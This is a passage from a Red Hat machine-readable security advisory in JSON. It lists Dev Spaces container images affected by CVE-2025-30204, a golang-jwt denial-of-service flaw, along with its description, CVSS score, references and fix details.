"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang.org/x/crypto/ssh: Denial of Service in the Key Exchange of golang.org/x/crypto/ssh"
},
{
"cve": "CVE-2025-30204",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2025-03-21T22:00:43.818367+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2354195"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the golang-jwt implementation of JSON Web Tokens (JWT). In affected versions, a malicious request with specially crafted Authorization header data may trigger an excessive consumption of resources on the host system. This issue can cause significant performance degradation or an application crash, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang-jwt/jwt: jwt-go allows excessive memory allocation during header parsing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-30204"
},
{
"category": "external",
"summary": "RHBZ#2354195",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2354195"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-30204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30204"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-30204",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30204"
},
{
"category": "external",
"summary": "https://github.com/golang-jwt/jwt/commit/0951d184286dece21f73c85673fd308786ffe9c3",
"url": "https://github.com/golang-jwt/jwt/commit/0951d184286dece21f73c85673fd308786ffe9c3"
},
{
"category": "external",
"summary": "https://github.com/golang-jwt/jwt/security/advisories/GHSA-mh63-6h87-95cp",
"url": "https://github.com/golang-jwt/jwt/security/advisories/GHSA-mh63-6h87-95cp"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3553",
"url": "https://pkg.go.dev/vuln/GO-2025-3553"
}
],
"release_date": "2025-03-21T21:42:01.382000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-05-28T02:39:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:8244"
},
{
"category": "workaround",
"details": "Red Hat Product Security does not have a recommended mitigation at this time.",
"product_ids": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
